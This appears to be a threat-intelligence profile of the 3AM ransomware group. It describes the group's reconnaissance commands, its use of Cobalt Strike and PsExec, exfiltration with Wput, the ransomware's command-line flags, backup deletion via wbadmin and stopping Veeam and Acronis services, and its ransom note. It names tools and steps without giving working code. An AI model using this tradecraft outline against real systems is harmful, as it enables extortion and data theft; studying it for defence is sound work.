Overview
The 3AM ransomware group is a newly emerged cybercriminal threat that has gained attention for its sophisticated tactics and adaptability. First observed by Symantec’s Threat Hunter Team, the group made its debut when an affiliate attempted to deploy the well-known LockBit ransomware but was thwarted by detection systems. In response, the attackers switched tactics and resorted to using 3AM, a completely new and unknown ransomware strain. This flexibility in adapting to security measures exemplifies a growing trend among ransomware actors, where attackers are quick to alter their approach based on real-time feedback from their targets’ defenses. The 3AM ransomware is still in the early stages of its deployment, with its use thus far being limited, but its technical sophistication indicates that it may soon become a more prominent player in the ransomware landscape.
What makes the
3AM ransomware particularly notable is its origins and development in Rust, a programming language known for its efficiency, memory safety, and obfuscation capabilities. By utilizing Rust, the group can create a more resilient and stealthy ransomware variant, capable of evading detection by traditional security solutions. Additionally, 3AM employs highly targeted methods to disable key services and backup systems on infected machines, making it more difficult for victims to recover their data. This strategy is not new for ransomware families, but 3AM seems to have fine-tuned these techniques, further complicating recovery efforts.
Common targets
Health Care and Social Assistance
Information
United States
Attack Vectors
Phishing
Software Vulnerabilities
How they operate
At the outset of an attack, 3AM leverages common penetration tools to escalate privileges and perform reconnaissance on the target network. One of the first signs of the attackers’ presence is the execution of the gpresult command to dump group policy settings, allowing them to understand the security policies in place on the targeted system. Following this, the attackers use tools like Cobalt Strike and PsExec to execute arbitrary commands and gain higher levels of access. The PsExec tool, for instance, allows the attackers to execute remote commands on other systems, aiding in lateral movement across the network. Additionally, reconnaissance commands such as whoami, netstat, and net share are run to enumerate the network, identifying shared resources and other systems that could be exploited.
Once sufficient access has been gained, the attackers begin preparing the environment for the ransomware deployment. They typically add a new user to the system for persistence and use the Wput tool to exfiltrate files to their own server. This phase of the attack often involves scanning the network for backup systems or sensitive files that can be targeted for encryption. However, the most notable characteristic of 3AM is its adaptability. Initially, the attackers attempted to deploy the more well-known LockBit ransomware, but when that attempt was thwarted, they quickly switched to deploying 3AM instead. This ability to adapt to defense mechanisms on the fly is a key feature of the group’s operational methodology.
The execution of the 3AM ransomware itself is highly methodical. The malware utilizes several command-line parameters to control its behavior, such as -k, which accepts a 32-character base64-encoded access key, and -m, which determines whether the attack will be executed locally or across the network. The ransomware also uses -s to control the speed of encryption by adjusting offsets within the files. Once the malware is executed, it begins by disabling crucial services, including security and backup services, to ensure that recovery efforts are thwarted. Commands such as wbadmin.exe are used to delete backup copies, while services like Veeam and Acronis are forcibly stopped to disable data restoration methods.
Following the disabling of key services, 3AM proceeds with the encryption of files. The ransomware scans for files that meet certain predefined criteria, and once identified, the files are encrypted with the .threeamtime extension. The original files are then deleted to prevent recovery. A ransom note, named “RECOVER-FILES.txt,” is created in each affected directory, detailing the ransom demand and the group’s threat to sell sensitive data on the Dark Web if the ransom is not paid. The note also references the mystique of “3 AM,” using psychological pressure to prompt victims into immediate action. The attackers warn against attempts to restore data independently, suggesting that doing so could lead to permanent data loss.
What makes the 3AM ransomware particularly dangerous is its targeted nature and the use of multiple layers of encryption, as well as its persistence on compromised networks. The group’s strategic approach ensures that not only are files encrypted, but recovery is made difficult through the destruction of backups and the prevention of self-restoration. Furthermore, the ransom demand is tied to sensitive data exfiltration, with the group threatening to leak stolen information on the Dark Web. This combination of file encryption and data theft makes 3AM a formidable threat to both individuals and organizations.
In conclusion, the 3AM ransomware group operates with a highly technical and adaptive approach, using advanced tools and strategies to infiltrate, exploit, and encrypt targeted networks. By leveraging common penetration tools for network reconnaissance and privilege escalation, followed by a highly controlled deployment of their ransomware, the group is able to bypass many traditional defenses. The technical sophistication of 3AM underscores the growing complexity of ransomware attacks and highlights the importance of comprehensive cybersecurity measures, including robust backup systems, network segmentation, and proactive threat detection capabilities. As the group continues to refine its methods, it is likely that 3AM will become an increasingly significant player in the global ransomware landscape.
